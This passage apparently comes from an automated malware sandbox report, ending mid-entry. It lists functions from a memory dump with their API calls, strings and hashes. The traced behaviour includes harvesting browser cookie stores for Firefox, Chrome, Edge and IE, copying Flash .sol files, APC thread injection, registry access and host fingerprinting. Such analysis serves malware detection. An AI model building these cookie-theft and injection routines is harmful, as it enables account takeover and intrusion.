                                                                                                                                        Function 00458DE2, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 3f7067ecc21fdbdc9034faace5eed640f97f86dcf4957db931886c22fe003b2a
                                                                                                                                        • Instruction ID: 5eabfa803b8c79286afc3ef428cbe8e89fc27869a783014e9762695920364404
                                                                                                                                        • Opcode Fuzzy Hash: 3f7067ecc21fdbdc9034faace5eed640f97f86dcf4957db931886c22fe003b2a
                                                                                                                                        • Instruction Fuzzy Hash: 35B01231980200EBCA014B00DD04F057B21A760700F014834F209800B096B10864EB0E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00448ED1, Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • memset.NTDLL ref: 00448EEF
                                                                                                                                          • Part of subcall function 00450EA4: memset.NTDLL ref: 00450ECA
                                                                                                                                          • Part of subcall function 00450EA4: memcpy.NTDLL ref: 00450EF2
                                                                                                                                          • Part of subcall function 00450EA4: GetLastError.KERNEL32(00000010,00000218,00466B7D,00000100,?,00000318,00000008), ref: 00450F09
                                                                                                                                          • Part of subcall function 00450EA4: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00466B7D,00000100), ref: 00450FEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4290293647-0
                                                                                                                                        • Opcode ID: 4e6c8e6127eb39a6e75dc8914ebaea744a0f6099b842a033b77e1e4ffc677546
                                                                                                                                        • Instruction ID: 67db2163e953fef9a493401794477625045386ba1b4bde4ce718a2bb6bc8e59d
                                                                                                                                        • Opcode Fuzzy Hash: 4e6c8e6127eb39a6e75dc8914ebaea744a0f6099b842a033b77e1e4ffc677546
                                                                                                                                        • Instruction Fuzzy Hash: 1001A2705053086BD7219F2ADC41B9B7BE8FF44318F10842FFC8496342DBB9D94986A5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00446498, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004464A2
                                                                                                                                          • Part of subcall function 00463F70: RegOpenKeyExA.KERNELBASE(004464BA,00000000,00000000,00020119,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FA9
                                                                                                                                          • Part of subcall function 00463F70: RegOpenKeyExA.ADVAPI32(004464BA,00000000,00000000,00020019,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FBD
                                                                                                                                          • Part of subcall function 00463F70: RegCloseKey.KERNELBASE(80000001,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00464006
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open$Closememset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1685373161-0
                                                                                                                                        • Opcode ID: b4bff4396496c5d89e2bf73dfd8529cdc612eebf9d42b2c95b85b2b0fac2f144
                                                                                                                                        • Instruction ID: da74bab1ac326c85e69530c3dc2ec8876f07c38be6c020f515eb2e2a09a7dd73
                                                                                                                                        • Opcode Fuzzy Hash: b4bff4396496c5d89e2bf73dfd8529cdc612eebf9d42b2c95b85b2b0fac2f144
                                                                                                                                        • Instruction Fuzzy Hash: A7E01730140108BBEF206F16DC02F893B75AF10358F00C026BE086D262E7B6EBB49799
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044F4CF, Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0046A5A8,0000002C,00449078,NTDLL.DLL,6547775A,00000000,00450ED7,?,00000318), ref: 0044F4E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: 7636e48f22f4b6ddba495283cdf86e865e4f42c104aa85b49417ae2780fa5e61
                                                                                                                                        • Instruction ID: 0552aae2e700a2930e46b583532321c9f5f7a933db5a35a9e875c2af22985d9a
                                                                                                                                        • Opcode Fuzzy Hash: 7636e48f22f4b6ddba495283cdf86e865e4f42c104aa85b49417ae2780fa5e61
                                                                                                                                        • Instruction Fuzzy Hash: 49D01730E00619DBDB209B95DC469DFFB70BF09720F608229E960731A0C6341D56CF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 004531EC, Relevance: 58.0, APIs: 16, Strings: 17, Instructions: 226memorystringfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(%APPDATA%,00466A88,00000000,?,00000000), ref: 00453204
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
                                                                                                                                          • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
                                                                                                                                          • Part of subcall function 00456E86: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00456FDC
                                                                                                                                          • Part of subcall function 00456E86: RtlEnterCriticalSection.NTDLL(?), ref: 00457011
                                                                                                                                          • Part of subcall function 00456E86: RtlLeaveCriticalSection.NTDLL(?), ref: 0045702D
                                                                                                                                          • Part of subcall function 00456E86: FindNextFileW.KERNEL32(?,00000000), ref: 00457046
                                                                                                                                          • Part of subcall function 00456E86: WaitForSingleObject.KERNEL32(00000000), ref: 00457058
                                                                                                                                          • Part of subcall function 00456E86: FindClose.KERNEL32(?), ref: 0045706D
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00457081
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 004570A3
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 0045324B
                                                                                                                                        • memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000), ref: 00453260
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 00453270
                                                                                                                                          • Part of subcall function 00456E86: FindNextFileW.KERNEL32(?,00000000), ref: 00457119
                                                                                                                                          • Part of subcall function 00456E86: WaitForSingleObject.KERNEL32(00000000), ref: 0045712B
                                                                                                                                          • Part of subcall function 00456E86: FindClose.KERNEL32(?), ref: 00457146
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000), ref: 00453294
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 004532AC
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 004532F8
                                                                                                                                        • lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000), ref: 00453317
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00453329
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000), ref: 00453380
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00453392
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000), ref: 004533B9
                                                                                                                                        • lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000), ref: 004533FF
                                                                                                                                        • DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000), ref: 00453428
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00453436
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00453459
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$lstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
                                                                                                                                        • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
                                                                                                                                        • API String ID: 659829602-1887243743
                                                                                                                                        • Opcode ID: b97140aea943932c6a80c7151d27e9e9900f0adef2bbe285a963884104116c87
                                                                                                                                        • Instruction ID: 2fed26c3facebf3222eebd7690d0a166b01ffc03ca3c7711eceef8b7c07a8277
                                                                                                                                        • Opcode Fuzzy Hash: b97140aea943932c6a80c7151d27e9e9900f0adef2bbe285a963884104116c87
                                                                                                                                        • Instruction Fuzzy Hash: 3761B471644304BFC320AF559C49D5B7BACEB89B46F00093AFD4592162FAB89D4CC66F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00458A61, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 224memoryfiletimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,59935A40,.dll), ref: 00458A8F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00458AB2
                                                                                                                                        • memset.NTDLL ref: 00458ACD
                                                                                                                                          • Part of subcall function 0044616D: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,59935A4D,00458AE6,73797325), ref: 0044617E
                                                                                                                                          • Part of subcall function 0044616D: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00446198
                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00458B0E
                                                                                                                                        • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00458B24
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00458B3E
                                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00458B4B
                                                                                                                                        • lstrcat.KERNEL32(?,642E2A5C), ref: 00458B90
                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00458BA5
                                                                                                                                        • CompareFileTime.KERNEL32(?,?), ref: 00458BC3
                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00458BD6
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00458BE4
                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00458BEF
                                                                                                                                        • CompareFileTime.KERNEL32(?,?), ref: 00458C0F
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002E), ref: 00458C47
                                                                                                                                        • memcpy.NTDLL(?,?,00000000), ref: 00458C7D
                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00458C92
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00458CA0
                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00458CAB
                                                                                                                                        • CompareFileTime.KERNEL32(?,?), ref: 00458CBB
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00458CF4
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,73797325), ref: 00458D07
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00458D18
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
                                                                                                                                        • String ID: .dll
                                                                                                                                        • API String ID: 455834338-2738580789
                                                                                                                                        • Opcode ID: daa8a21e3283209211e09e3a7d71f97aba8b6bc79ff5a6444081b6c89991f9ad
                                                                                                                                        • Instruction ID: 8fbc509e77b8f0db425f194887632d77f7adb8a5e6daadbfba12b74ecc791788
                                                                                                                                        • Opcode Fuzzy Hash: daa8a21e3283209211e09e3a7d71f97aba8b6bc79ff5a6444081b6c89991f9ad
                                                                                                                                        • Instruction Fuzzy Hash: 6A818CB1505341AFD711DF25CC84E6BBBE8FB98341F00092EF985D2261EBB4D949CB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00456E86, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 00456D60: ExpandEnvironmentStringsW.KERNEL32(00449CC5,00000000,00000000,00000001,00000000,00000000,?,00449CC5,00000000), ref: 00456D77
                                                                                                                                          • Part of subcall function 00456D60: ExpandEnvironmentStringsW.KERNEL32(00449CC5,00000000,00000000,00000000), ref: 00456D91
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                        • memset.NTDLL ref: 00456F26
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                        • lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                        • memset.NTDLL ref: 00456FA4
                                                                                                                                        • wcscpy.NTDLL ref: 00456FB6
                                                                                                                                        • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00456FDC
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00457011
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0045702D
                                                                                                                                        • FindNextFileW.KERNEL32(?,00000000), ref: 00457046
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 00457058
                                                                                                                                        • FindClose.KERNEL32(?), ref: 0045706D
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,00000000), ref: 00457081
                                                                                                                                        • lstrlenW.KERNEL32(0000002C), ref: 004570A3
                                                                                                                                        • FindNextFileW.KERNEL32(?,00000000), ref: 00457119
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 0045712B
                                                                                                                                        • FindClose.KERNEL32(?), ref: 00457146
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962561936-0
                                                                                                                                        • Opcode ID: 3cb37b7c87d82707f255927f519064b70d125d8c2b851bfacd80afb2d877990e
                                                                                                                                        • Instruction ID: 9bd9c86d9809d38f56bcf8e5926710411a7f53af65494e464f93c3df50cc7eb8
                                                                                                                                        • Opcode Fuzzy Hash: 3cb37b7c87d82707f255927f519064b70d125d8c2b851bfacd80afb2d877990e
                                                                                                                                        • Instruction Fuzzy Hash: C7818071508305AFD760EF25DC84A1BBBE9FF84705F00492EF985962A3DB78D848CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044DE6E, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 363memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DEA4
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DED6
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF08
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF3A
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF6C
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DF9E
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044DFD0
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E002
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E034
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E097
                                                                                                                                          • Part of subcall function 0044D57C: lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
                                                                                                                                          • Part of subcall function 0044D57C: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
                                                                                                                                          • Part of subcall function 0044D57C: memset.NTDLL ref: 0044D5B7
                                                                                                                                          • Part of subcall function 0044BE4A: RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0044BE53
                                                                                                                                          • Part of subcall function 0044BE4A: HeapFree.KERNEL32(00000000,?,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044BE85
                                                                                                                                          • Part of subcall function 0044BE4A: RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0044BEA3
                                                                                                                                        • StrToIntExA.SHLWAPI(00000000,00000000,004656AA,00000001,00000000,74B04D40,?,?,004656AA,00000000,00000000,0044BA4B,?,?), ref: 0044E0C2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalFreeHeapSection$EnterLeavelstrlenmemcpymemset
                                                                                                                                        • String ID: Scr
                                                                                                                                        • API String ID: 3985022405-1633706383
                                                                                                                                        • Opcode ID: 74eec2789e88a12e93a76b97927be945122450c8d2469432d77e677e83f75572
                                                                                                                                        • Instruction ID: 653eb1732191f925ad78439a6fa1a454438b848e83d801dccbefdaef23513913
                                                                                                                                        • Opcode Fuzzy Hash: 74eec2789e88a12e93a76b97927be945122450c8d2469432d77e677e83f75572
                                                                                                                                        • Instruction Fuzzy Hash: CAB193B1B102257BE720EB778C95E6B36DCBB18740714483BF906C7245EABCD809876E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461C05, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wcscpy.NTDLL ref: 00461C32
                                                                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00461C3E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00461C4F
                                                                                                                                        • memset.NTDLL ref: 00461C6C
                                                                                                                                        • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 00461C7A
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 00461C88
                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00461C96
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00461CA2
                                                                                                                                        • wcscpy.NTDLL ref: 00461CB5
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00461CCF
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00461CE8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                                                                                                        • String ID: \\?\
                                                                                                                                        • API String ID: 3888849384-4282027825
                                                                                                                                        • Opcode ID: d570fca3f95ebdd380a21d27d92cc897a2f21dff9cdd8e74faa6adbd67db00f0
                                                                                                                                        • Instruction ID: 611017bbe394a62b7e11cdac1e7ad7865585692370d21bcad652b4ea63342d69
                                                                                                                                        • Opcode Fuzzy Hash: d570fca3f95ebdd380a21d27d92cc897a2f21dff9cdd8e74faa6adbd67db00f0
                                                                                                                                        • Instruction Fuzzy Hash: 72318E32900108BFCB119B96DD49CDFBFB9FF45364B10442AF104E2160EB75AA55DBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00443861, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 65threadprocesslibraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 00443887
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00443893
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,00000000,?,00000000), ref: 004438AA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004438B1
                                                                                                                                        • Thread32First.KERNEL32(?,0000001C), ref: 004438C1
                                                                                                                                        • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 004438DC
                                                                                                                                        • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 004438ED
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004438F4
                                                                                                                                        • Thread32Next.KERNEL32(?,0000001C), ref: 004438FD
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00443909
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                                                                                                        • String ID: ExitProcess$KERNEL32.DLL
                                                                                                                                        • API String ID: 2341152533-108369947
                                                                                                                                        • Opcode ID: e4855375b68a507f536ba7745f1221919b102e4a41390f9053e7144e939cb0e0
                                                                                                                                        • Instruction ID: a3e8afd9ccabfc3154fc22d293c1470253cce5c6f2c26f6adc2def29a7190487
                                                                                                                                        • Opcode Fuzzy Hash: e4855375b68a507f536ba7745f1221919b102e4a41390f9053e7144e939cb0e0
                                                                                                                                        • Instruction Fuzzy Hash: 3B117F7190021CBFEF106FA0DC85DEE7B79EB08755F10413AFA01A2150DBB88E459B69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00444C96, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00444CC9
                                                                                                                                        • GetLastError.KERNEL32 ref: 00444CD7
                                                                                                                                        • NtSetInformationProcess.NTDLL ref: 00444D31
                                                                                                                                        • GetProcAddress.KERNEL32(456C7452,00000000), ref: 00444D70
                                                                                                                                        • GetProcAddress.KERNEL32(61657243), ref: 00444D91
                                                                                                                                        • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 00444DE8
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444DFE
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444E24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3529370251-0
                                                                                                                                        • Opcode ID: 46ed516da982ce2919b53f5b0312a35faa5074979abc545b65a9a0deb85bdce5
                                                                                                                                        • Instruction ID: fbe645c044fc139c49eb66d01eb85583fdc678f857f3c8fe1c19bf9f57d4c08f
                                                                                                                                        • Opcode Fuzzy Hash: 46ed516da982ce2919b53f5b0312a35faa5074979abc545b65a9a0deb85bdce5
                                                                                                                                        • Instruction Fuzzy Hash: 17417CB0508345EFE710DF25DC44A2BBBE4FB88308F140A2EF55592260E7B49A49DB6B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00454270, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004542BE
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0045AEDA), ref: 004542F1
                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00454318
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0045432C
                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00454339
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0045435C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateComputerFreeName
                                                                                                                                        • String ID: Client$TnF
                                                                                                                                        • API String ID: 3439771632-619858459
                                                                                                                                        • Opcode ID: 6141f11e083e8caafa2530f1444dba21f811dfcad0cf1de0a291f09382d6391d
                                                                                                                                        • Instruction ID: 8f9f988018139ce6461ffe270a4ccba3909b139122d1c27117b739c66cfb46a8
                                                                                                                                        • Opcode Fuzzy Hash: 6141f11e083e8caafa2530f1444dba21f811dfcad0cf1de0a291f09382d6391d
